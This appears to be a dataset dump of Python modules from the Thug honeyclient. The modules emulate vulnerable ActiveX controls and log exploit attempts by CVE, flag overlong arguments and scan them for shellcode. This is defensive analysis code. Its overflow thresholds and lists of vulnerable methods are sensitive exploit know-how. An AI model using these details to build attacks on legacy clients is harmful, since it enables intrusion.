id
int64 0
458k
| file_name
stringlengths 4
119
| file_path
stringlengths 14
227
| content
stringlengths 24
9.96M
| size
int64 24
9.96M
| language
stringclasses 1
value | extension
stringclasses 14
values | total_lines
int64 1
219k
| avg_line_length
float64 2.52
4.63M
| max_line_length
int64 5
9.91M
| alphanum_fraction
float64 0
1
| repo_name
stringlengths 7
101
| repo_stars
int64 100
139k
| repo_forks
int64 0
26.4k
| repo_open_issues
int64 0
2.27k
| repo_license
stringclasses 12
values | repo_extraction_date
stringclasses 433
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13,000
|
StormConfig.py
|
buffer_thug/thug/ActiveX/modules/StormConfig.py
|
# BaoFeng Storm ActiveX Control SetAttributeValue() Buffer Overflow Vulnerability
# CVE-2009-1807
import logging
log = logging.getLogger("Thug")
def SetAttributeValue(self, arg0, arg1, arg2): # pylint:disable=unused-argument
if len(arg0) > 260:
log.ThugLogging.log_exploit_event(
self._window.url,
"BaoFeng Storm ActiveX Control",
"SetAttributeValue Buffer Overflow",
cve="CVE-2009-1807",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2009-1807")
log.ThugLogging.Shellcode.check_shellcode(arg0)
| 609
|
Python
|
.py
| 14
| 36.142857
| 87
| 0.691525
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,001
|
SSReaderPdg2.py
|
buffer_thug/thug/ActiveX/modules/SSReaderPdg2.py
|
# SSReader Pdg2 ActiveX control (pdg2.dll)
# CVE-2007-5892
import logging
log = logging.getLogger("Thug")
def Register(self, arg0, arg1): # pylint:disable=unused-argument
if len(arg1) > 255:
log.ThugLogging.log_exploit_event(
self._window.url,
"SSReader Pdg2 ActiveX",
"Register Method Overflow",
cve="CVE-2007-5892",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5892")
log.ThugLogging.Shellcode.check_shellcode(arg1)
def LoadPage(self, arg0, arg1, arg2, arg3): # pylint:disable=unused-argument
if len(arg0) > 255:
log.ThugLogging.log_exploit_event(
self._window.url,
"SSReader Pdg2 ActiveX",
"LoadPage Method Overflow",
cve="CVE-2007-5892",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5892")
log.ThugLogging.Shellcode.check_shellcode(arg0)
| 980
|
Python
|
.py
| 24
| 32.5
| 87
| 0.64557
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,002
|
SnapshotViewer.py
|
buffer_thug/thug/ActiveX/modules/SnapshotViewer.py
|
# Microsoft Access Snapshot Viewer
# CVE-2008-2463
import logging
log = logging.getLogger("Thug")
def PrintSnapshot(self, SnapshotPath="", CompressedPath=""):
if SnapshotPath:
self.SnapshotPath = SnapshotPath
if CompressedPath:
self.CompressedPath = CompressedPath
msg = f"[Microsoft Access Snapshot Viewer ActiveX] SnapshotPath : {self.SnapshotPath}, CompressedPath: {self.CompressedPath}"
log.ThugLogging.add_behavior_warn(msg, "CVE-2008-2463")
log.ThugLogging.log_exploit_event(
self._window.url,
"Microsoft Access Snapshot Viewer ActiveX",
"Print Snapshot",
forward=False,
cve="CVE-2008-2463",
data={"SnapshotPath": self.SnapshotPath, "CompressedPath": self.CompressedPath},
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2008-2463")
url = self.SnapshotPath
try:
self._window._navigator.fetch(url, redirect_type="CVE-2008-2463")
except Exception: # pragma: no cover,pylint:disable=broad-except
log.ThugLogging.add_behavior_warn(
"[Microsoft Access Snapshot Viewer ActiveX] Fetch failed"
)
| 1,165
|
Python
|
.py
| 27
| 36.666667
| 129
| 0.706195
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,003
|
QvodCtrl.py
|
buffer_thug/thug/ActiveX/modules/QvodCtrl.py
|
# Qvod Player QvodCtrl Class ActiveX Control
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetURL(self, val):
self.__dict__["URL"] = val
self.__dict__["url"] = val
if len(val) > 800:
log.ThugLogging.log_exploit_event(
self._window.url,
"Qvod Player QvodCtrl Class ActiveX",
"Overflow in URL property",
)
log.ThugLogging.Shellcode.check_shellcode(val)
| 447
|
Python
|
.py
| 14
| 25.428571
| 54
| 0.633178
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,004
|
WindowsMediaPlayer.py
|
buffer_thug/thug/ActiveX/modules/WindowsMediaPlayer.py
|
import logging
log = logging.getLogger("Thug")
def Play(self): # pylint:disable=unused-argument
log.warning("[WindowsMediaPlayer] Play")
| 145
|
Python
|
.py
| 4
| 33.5
| 49
| 0.768116
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,005
|
RDSDataSpace.py
|
buffer_thug/thug/ActiveX/modules/RDSDataSpace.py
|
# Microsoft MDAC RDS.Dataspace ActiveX
# CVE-2006-0003
import logging
log = logging.getLogger("Thug")
def CreateObject(self, _object, param=""): # pylint:disable=unused-argument
from thug import ActiveX
log.ThugLogging.add_behavior_warn(
f"[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject ({_object})"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"Microsoft MDAC RDS.Dataspace ActiveX",
"CreateObject",
cve="CVE-2006-0003",
forward=False,
data={"object": _object},
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2006-0003")
return ActiveX.ActiveX._ActiveXObject(self._window, _object)
| 712
|
Python
|
.py
| 19
| 31.736842
| 83
| 0.692868
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,006
|
NeoTracePro.py
|
buffer_thug/thug/ActiveX/modules/NeoTracePro.py
|
# NeoTraceExplorer.NeoTraceLoader ActiveX control (NeoTraceExplorer.dll)
# CVE-2006-6707
import logging
log = logging.getLogger("Thug")
def TraceTarget(self, target):
if len(target) > 255:
log.ThugLogging.log_exploit_event(
self._window.url,
"NeoTraceExplorer.NeoTraceLoader ActiveX",
"Overflow in arg0",
cve="CVE-2006-6707",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2006-6707")
log.ThugLogging.Shellcode.check_shellcode(target)
| 547
|
Python
|
.py
| 14
| 31.714286
| 87
| 0.681818
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,007
|
FacebookPhotoUploader.py
|
buffer_thug/thug/ActiveX/modules/FacebookPhotoUploader.py
|
# Facebook Photo Uploader 4.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetExtractIptc(self, val):
self.__dict__["ExtractIptc"] = val
if len(val) > 255:
log.ThugLogging.log_exploit_event(
self._window.url,
"FaceBook Photo Uploader ActiveX",
"Overflow in ExtractIptc property",
)
log.ThugLogging.Shellcode.check_shellcode(val)
def SetExtractExif(self, val):
self.__dict__["ExtractExif"] = val
if len(val) > 255:
log.ThugLogging.log_exploit_event(
self._window.url,
"FaceBook Photo Uploader ActiveX",
"Overflow in ExtractExif property",
)
log.ThugLogging.Shellcode.check_shellcode(val)
| 751
|
Python
|
.py
| 22
| 26.590909
| 54
| 0.63939
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,008
|
ConnectAndEnterRoom.py
|
buffer_thug/thug/ActiveX/modules/ConnectAndEnterRoom.py
|
# GlobalLink ConnectAndEnterRoom ActiveX Control ConnectAndEnterRoom() Method Overflow Vulnerability
# CVE-2007-5722
import logging
log = logging.getLogger("Thug")
def ConnectAndEnterRoom(self, arg0, arg1, arg2, arg3, arg4, arg5): # pylint:disable=unused-argument
if len(arg0) > 172:
log.ThugLogging.log_exploit_event(
self._window.url,
"GlobalLink ConnectAndEnterRoom ActiveX",
"ConnectAndEnterRoom Overflow",
cve="CVE-2007-5722",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5722")
log.ThugLogging.Shellcode.check_shellcode(arg0)
| 652
|
Python
|
.py
| 14
| 39.214286
| 100
| 0.706161
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,009
|
ICQToolbar.py
|
buffer_thug/thug/ActiveX/modules/ICQToolbar.py
|
# ICQ Toolbar attack
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def GetPropertyById(self, arg0, arg1): # pylint:disable=unused-argument
if len(arg1) > 120:
log.ThugLogging.log_exploit_event(
self._window.url,
"ICQ Toolbar ActiveX",
"Buffer overflow in GetPropertyById",
)
log.ThugLogging.Shellcode.check_shellcode(arg1)
| 407
|
Python
|
.py
| 12
| 27.25
| 72
| 0.670077
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,010
|
WMP.py
|
buffer_thug/thug/ActiveX/modules/WMP.py
|
import logging
log = logging.getLogger("Thug")
def openPlayer(self, arg): # pylint:disable=unused-argument
log.warning(arg)
| 132
|
Python
|
.py
| 4
| 30.25
| 60
| 0.768
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,011
|
UUSeeUpdate.py
|
buffer_thug/thug/ActiveX/modules/UUSeeUpdate.py
|
# UUSee UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download Vulnerability
# CVE...
import logging
log = logging.getLogger("Thug")
def Update(self, *args): # pylint:disable=unused-argument
log.ThugLogging.log_exploit_event(
self._window.url, "UUsee UUPgrade ActiveX", "Attack in Update Method"
)
| 330
|
Python
|
.py
| 8
| 37.75
| 87
| 0.751572
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,012
|
Shockwave.py
|
buffer_thug/thug/ActiveX/modules/Shockwave.py
|
import logging
log = logging.getLogger("Thug")
def ShockwaveVersion(self, arg):
if len(arg) >= 768 * 768:
log.ThugLogging.log_exploit_event(
self._window.url, "Shockwave", "ShockwaveVersion Stack Overflow"
)
log.ThugLogging.Shellcode.check_shellcode(arg)
| 298
|
Python
|
.py
| 8
| 30.875
| 76
| 0.682927
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,013
|
MicrosoftWorks7Attack.py
|
buffer_thug/thug/ActiveX/modules/MicrosoftWorks7Attack.py
|
import logging
log = logging.getLogger("Thug")
def SetWksPictureInterface(self, val):
self.__dict__["WksPictureInterface"] = val
log.ThugLogging.log_exploit_event(
self._window.url,
"MicrosoftWorks7 ActiveX",
"Overflow in WksPictureInterface property",
)
| 295
|
Python
|
.py
| 9
| 27.333333
| 51
| 0.705674
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,014
|
DVRHOSTWeb.py
|
buffer_thug/thug/ActiveX/modules/DVRHOSTWeb.py
|
# DVRHOST Web CMS OCX 1.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def TimeSpanFormat(self, arg0, arg1): # pylint:disable=unused-argument
if len(arg1) > 512:
log.ThugLogging.log_exploit_event(
self._window.url,
"DVRHOST Web CMS OCX ActiveX",
"Overflow in TimeSpanFormat",
)
log.ThugLogging.Shellcode.check_shellcode(arg1)
| 411
|
Python
|
.py
| 12
| 27.583333
| 71
| 0.663291
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,015
|
AdodbStream.py
|
buffer_thug/thug/ActiveX/modules/AdodbStream.py
|
from io import BytesIO
import logging
log = logging.getLogger("Thug")
def getSize(self):
fobject = getattr(self, "fobject", None)
content = self.fobject.getvalue() if fobject else str()
return len(content)
def open(self): # pylint:disable=redefined-builtin
log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] open")
self.fobject = BytesIO()
def Read(self, length=-1):
log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] Read")
fobject = getattr(self, "fobject", None)
content = self.fobject.getvalue() if fobject else str()
if length > 0:
length = min(length, len(content))
return content[self.position : length] if length > 0 else content[self.position :]
def Write(self, s):
log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] Write")
self.fobject.write(s.encode())
def SaveToFile(self, filename, opt=0):
log.ThugLogging.add_behavior_warn(
f"[Adodb.Stream ActiveX] SaveToFile({filename}, {opt})"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"Adodb.Stream ActiveX",
"SaveToFile",
data={"file": filename},
forward=False,
)
content = self.fobject.getvalue()
mtype = log.Magic.get_mime(content)
log.ThugLogging.log_file(content, url=filename, sampletype=mtype)
self._files[filename] = content
def LoadFromFile(self, filename):
log.ThugLogging.add_behavior_warn(
f"[Adodb.Stream ActiveX] LoadFromFile({filename})"
)
if filename not in self._files:
raise TypeError()
self._current = filename
def ReadText(self, NumChars=-1):
log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] ReadText")
if NumChars == -1:
return self._files[self._current][self.position :]
return self._files[self._current][self.position : self.position + NumChars]
def WriteText(self, data, options=None): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(f"[Adodb.Stream ActiveX] WriteText({data})")
self.fobject.write(data.encode())
def Close(self):
log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] Close")
self.fobject.close()
def setPosition(self, pos):
log.ThugLogging.add_behavior_warn(
f"[Adodb.Stream ActiveX] Changed position in fileobject to: ({pos})"
)
self.__dict__["position"] = pos
self.fobject.seek(pos)
| 2,404
|
Python
|
.py
| 59
| 35.372881
| 86
| 0.69892
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,016
|
MacrovisionFlexNet.py
|
buffer_thug/thug/ActiveX/modules/MacrovisionFlexNet.py
|
# MacrovisionJob, MacrovisionFlexNet
# CVE-2007-2419, CVE-2007-5660, CVE-2007-6654, CVE-2007-0321, CVE-2007-0328
import logging
log = logging.getLogger("Thug")
def Initialize(self, *args): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] Initialize")
def CreateJob(self, name, arg, job_id):
log.ThugLogging.add_behavior_warn(
f'[Macrovision ActiveX] CreateJob("{name}", "{arg}", "{job_id}")'
)
return self
def DownloadAndExecute(self, arg0, arg1, arg2, arg3, arg4):
log.ThugLogging.add_behavior_warn(
f"[Macrovision ActiveX] DownloadAndExecute("
f'"{arg0}", "{arg1}", "{arg2}", "{arg3}", "{arg4}")'
)
log.ThugLogging.log_exploit_event(
self._window.url,
"Macrovision ActiveX",
"DownloadAndExecute",
data={"arg": arg0, "arg1": arg1, "arg2": arg2, "arg3": arg3, "arg4": arg4},
forward=False,
)
if len(arg1) > 512:
log.ThugLogging.log_exploit_event(
self._window.url,
"Macrovision ActiveX",
"DownloadAndExecute overflow",
cve="CVE-2007-2419, CVE-2007-6654",
)
log.ThugLogging.Shellcode.check_shellcode(arg1)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6654")
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg3}")
try:
self._window._navigator.fetch(arg3, redirect_type="Macrovision Exploit")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] Fetch failed")
def DownloadAndInstall(self, *args): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] DownloadAndInstall")
def AddFileEx(self, arg0, arg1, arg2, arg3, arg4, arg5, arg6): # pylint:disable=unused-argument
if len(arg2) > 512:
log.ThugLogging.log_exploit_event(
self._window.url,
"Macrovision ActiveX",
"AddFileEx overflow",
cve="CVE-2007-2419",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
log.ThugLogging.Shellcode.check_shellcode(arg2)
def AddFile(self, arg0, arg1):
log.ThugLogging.add_behavior_warn(
f'[Macrovision ActiveX] AddFile("{arg0}", "{arg1}")'
)
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg0}")
log.ThugLogging.log_exploit_event(
self._window.url,
"Macrovision ActiveX",
"AddFile/Fetch from URL",
cve="CVE-2007-2419",
forward=False,
data={"url": arg0, "arg1": arg1},
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
try:
self._window._navigator.fetch(arg0, redirect_type="Macrovision Exploit 2")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] Fetch failed")
def SetPriority(self, priority): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] SetPriority({priority})")
def SetNotifyFlags(self, flags): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] SetNotifyFlags({flags})")
def RunScheduledJobs(self): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] RunScheduledJobs()")
| 3,549
|
Python
|
.py
| 74
| 41.013514
| 96
| 0.684943
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,017
|
TextStream.py
|
buffer_thug/thug/ActiveX/modules/TextStream.py
|
import os
import hashlib
import string
import random
import errno
import logging
log = logging.getLogger("Thug")
class TextStream:
def __init__(self):
self.stream = []
self._Line = 1
self._Column = 1
self._currentLine = 1
self._currentColumn = 1
self._filename = ""
@property
def Line(self):
return self._Line
@property
def Column(self):
return self._Column
@property
def AtEndOfLine(self):
line = self.stream[self._currentLine - 1]
return self._currentColumn >= len(line)
@property
def AtEndOfStream(self):
if self._currentLine in (self._Line,) and self._currentColumn in (
self._Column - 1,
):
return True
return False
def Read(self, characters):
consume = characters
result = ""
while consume > 0:
if self._currentLine > self._Line:
break
if (
self._currentLine == self._Line and self._currentColumn > self._Column
): # pragma: no cover
break
line = self.stream[self._currentLine - 1]
eline = line[self._currentColumn - 1 :]
length = min(len(eline), consume)
result += eline[:length]
consume -= length
if consume > 0: # pragma: no cover
result += "\n"
consume -= 1
self._currentLine += 1
self._currentColumn = 1
else:
self._currentColumn += length
return result
def ReadLine(self):
if self._currentLine > self._Line:
return ""
result = self.stream[self._currentLine - 1]
self._currentLine += 1
self._currentColumn = 1
return result
def ReadAll(self):
result = "\n".join(self.stream)
self._currentLine = len(self.stream)
self._currentColumn = len(self.stream[self._currentLine - 1])
return result
def Write(self, _string):
_str_string = str(_string)
if not _str_string:
return
sstring = _str_string.split("\n")
if len(self.stream) == self._Line - 1:
self.stream.append(str())
self.stream[self._Line - 1] += sstring[0]
self._Column += len(sstring[0])
lines_no = len(sstring)
if lines_no == 1:
return
for i in range(1, lines_no):
self._Line += 1
self.stream.append(str())
self.stream[self._Line - 1] = sstring[i]
self._Column += len(sstring[i])
def WriteLine(self, _string):
self.Write(str(_string) + "\n")
self._Column = 1
def WriteBlankLines(self, lines):
self.Write(lines * "\n")
self._Column = 1
def Skip(self, characters):
skip = characters
while skip > 0:
line = self.stream[self._currentLine - 1]
eline = line[self._currentColumn - 1 :]
if skip > len(eline) + 1: # pragma: no cover
self._currentLine += 1
self._currentColumn = 1
else:
self._currentColumn += skip
skip -= len(eline) + 1
def SkipLine(self):
self._currentLine += 1
self._currentColumn = 1
def Close(self):
content = "\n".join(self.stream)
log.info(content)
_content = content.encode() if isinstance(content, str) else content
data = {
"content": content,
"status": 200,
"md5": hashlib.md5(_content).hexdigest(), # nosec
"sha256": hashlib.sha256(_content).hexdigest(),
"fsize": len(content),
"ctype": "textstream",
"mtype": log.Magic.get_mime(_content),
}
log.ThugLogging.log_location(log.ThugLogging.url, data)
log.TextClassifier.classify(log.ThugLogging.url, content)
if not log.ThugOpts.file_logging:
return
log_dir = os.path.join(log.ThugLogging.baseDir, "analysis", "textstream")
try:
os.makedirs(log_dir)
except OSError as e: # pragma: no cover
if e.errno == errno.EEXIST:
pass
else:
raise
filename = (
self._filename.split("\\")[-1] if "\\" in self._filename else self._filename
) # pylint:disable=use-maxsplit-arg
if not filename: # pragma: no cover
filename = "".join(random.choice(string.ascii_lowercase) for i in range(8))
log_file = os.path.join(log_dir, filename)
with open(log_file, encoding="utf-8", mode="w") as fd:
fd.write(content)
| 4,792
|
Python
|
.py
| 137
| 24.744526
| 88
| 0.543167
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,018
|
ScriptingFileSystemObject.py
|
buffer_thug/thug/ActiveX/modules/ScriptingFileSystemObject.py
|
import os
import string
import random
import logging
from thug.ActiveX.modules import WScriptShell
from thug.ActiveX.modules import TextStream
from thug.ActiveX.modules import File
from thug.ActiveX.modules import Folder
from thug.OS.Windows import win32_files
from thug.OS.Windows import win32_folders
log = logging.getLogger("Thug")
def BuildPath(self, arg0, arg1): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] BuildPath("{arg0}", "{arg1}")'
)
return f"{arg0}\\{arg1}"
def CopyFile(self, source, destination, overwritefiles=False): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] CopyFile("{source}", "{destination}")'
)
log.TextFiles[destination] = log.TextFiles[source]
def DeleteFile(self, filespec, force=False): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] DeleteFile("{filespec}", {force})'
)
def CreateTextFile(self, filename, overwrite=False, _unicode=False): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] CreateTextFile("{filename}", '
f'"{overwrite}", '
f'"{_unicode}")'
)
stream = TextStream.TextStream()
stream._filename = filename
return stream
def CreateFolder(self, path): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] CreateFolder("{path}")'
)
return Folder.Folder(path)
def FileExists(self, filespec): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] FileExists("{filespec}")'
)
if not filespec:
return True
if filespec.lower() in win32_files:
return True
if getattr(log, "TextFiles", None) and filespec in log.TextFiles:
return True
return False
def FolderExists(self, folder): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] FolderExists("{folder}")'
)
return str(folder).lower() in win32_folders
def GetExtensionName(self, path): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] GetExtensionName("{path}")'
)
ext = os.path.splitext(path)[1]
return ext if ext else ""
def GetFile(self, filespec): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] GetFile("{filespec}")'
)
return File.File(filespec)
def GetSpecialFolder(self, arg):
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] GetSpecialFolder("{arg}")'
)
arg = int(arg)
folder = ""
if arg == 0:
folder = WScriptShell.ExpandEnvironmentStrings(self, "%windir%")
elif arg == 1:
folder = WScriptShell.ExpandEnvironmentStrings(self, "%SystemRoot%\\system32")
elif arg == 2:
folder = WScriptShell.ExpandEnvironmentStrings(self, "%TEMP%")
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] Returning {folder} for GetSpecialFolder("{arg}")'
)
return folder
def GetTempName(self): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
"[Scripting.FileSystemObject ActiveX] GetTempName()"
)
return "".join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(8)
)
def MoveFile(self, source, destination): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] MoveFile("{source}", "{destination}")'
)
log.TextFiles[destination] = log.TextFiles[source]
del log.TextFiles[source]
def OpenTextFile(self, sFilePathAndName, ForWriting=True, flag=True):
log.ThugLogging.add_behavior_warn(
f'[Scripting.FileSystemObject ActiveX] OpenTextFile("{sFilePathAndName}", '
f'"{ForWriting}" ,'
f'"{flag}")'
)
log.ThugLogging.log_exploit_event(
self._window.url,
"Scripting.FileSystemObject ActiveX",
"OpenTextFile",
data={"filename": sFilePathAndName, "ForWriting": ForWriting, "flag": flag},
forward=False,
)
if getattr(log, "TextFiles", None) is None:
log.TextFiles = {}
if sFilePathAndName in log.TextFiles:
return log.TextFiles[sFilePathAndName]
stream = TextStream.TextStream()
stream._filename = sFilePathAndName
if log.ThugOpts.local and sFilePathAndName in (
log.ThugLogging.url,
): # pragma: no cover
with open(sFilePathAndName, encoding="utf-8", mode="r") as fd:
data = fd.read()
stream.Write(data)
log.TextFiles[sFilePathAndName] = stream
return stream
| 4,975
|
Python
|
.py
| 122
| 35.02459
| 102
| 0.707043
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,019
|
AnswerWorks.py
|
buffer_thug/thug/ActiveX/modules/AnswerWorks.py
|
# Vantage Linguistics AnserWorks ActiveX Controls
# CVE-2007-6387
import logging
log = logging.getLogger("Thug")
def GetHistory(self, arg):
if len(arg) > 215:
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6387")
log.ThugLogging.log_exploit_event(
self._window.url,
"AnswerWorks ActiveX",
"Overflow in GetHistory",
cve="CVE-2007-6387",
)
log.ThugLogging.Shellcode.check_shellcode(arg)
def GetSeedQuery(self, arg):
if len(arg) > 215:
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6387")
log.ThugLogging.log_exploit_event(
self._window.url,
"AnswerWorks ActiveX",
"Overflow in GetSeedQuery",
cve="CVE-2007-6387",
)
log.ThugLogging.Shellcode.check_shellcode(arg)
def SetSeedQuery(self, arg):
if len(arg) > 215:
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6387")
log.ThugLogging.log_exploit_event(
self._window.url,
"AnswerWorks ActiveX",
"Overflow in SetSeedQuery",
cve="CVE-2007-6387",
)
log.ThugLogging.Shellcode.check_shellcode(arg)
| 1,275
|
Python
|
.py
| 34
| 28.852941
| 87
| 0.631792
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,020
|
MyspaceUploader.py
|
buffer_thug/thug/ActiveX/modules/MyspaceUploader.py
|
# MySpace Uploader Control 1.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetAction(self, val):
self.__dict__["Action"] = val
if len(val) > 512:
log.ThugLogging.log_exploit_event(
self._window.url, "Myspace UPloader ActiveX", "Overflow in Action property"
)
log.ThugLogging.Shellcode.check_shellcode(val)
| 376
|
Python
|
.py
| 11
| 28.727273
| 87
| 0.680556
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,021
|
OfficeOCX.py
|
buffer_thug/thug/ActiveX/modules/OfficeOCX.py
|
# Multiple Office OCX ActiveX Controls 'OpenWebFile()' Arbitrary
# Program Execution Vulnerability
# BID-33243
import logging
log = logging.getLogger("Thug")
def OpenWebFile(self, _file):
log.ThugLogging.add_behavior_warn(
"[Office OCX ActiveX] OpenWebFile Arbitrary Program Execution Vulnerability"
)
log.ThugLogging.add_behavior_warn(f"[Office OCX ActiveX] Fetching from URL {_file}")
log.ThugLogging.log_exploit_event(
self._window.url,
"Office OCX ActiveX",
"OpenWebFile Arbitrary Program Execution Vulnerability (BID-33243)",
forward=False,
data={"url": _file},
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "BID-33243")
try:
self._window._navigator.fetch(_file, redirect_type="Office OCX Exploit")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn("[Office OCX ActiveX] Fetch failed")
| 945
|
Python
|
.py
| 22
| 37.318182
| 88
| 0.716467
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,022
|
AdodbRecordset.py
|
buffer_thug/thug/ActiveX/modules/AdodbRecordset.py
|
import collections
from thug.DOM.JSClass import JSClass
class Fields(JSClass):
def __init__(self, items=None):
self.items = collections.OrderedDict() if items is None else items
@property
def count(self):
return len(self.items)
def item(self, key):
if isinstance(key, str):
return getattr(self.items, key, None)
try:
index = int(key)
except ValueError: # pragma: no cover
return None
if index < 0 or index > self.count - 1:
return None
return self.items[index] # pragma: no cover
| 610
|
Python
|
.py
| 18
| 25.777778
| 74
| 0.614726
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,023
|
IMWebControl.py
|
buffer_thug/thug/ActiveX/modules/IMWebControl.py
|
# iMesh<= 7.1.0.x IMWebControl Class
# CVE-2007-6493, CVE-2007-6492
import logging
log = logging.getLogger("Thug")
def ProcessRequestEx(self, arg):
if not arg:
log.ThugLogging.log_exploit_event(
self._window.url,
"iMesh IMWebControl ActiveX",
"NULL value in ProcessRequestEx",
cve="CVE-2007-6492",
)
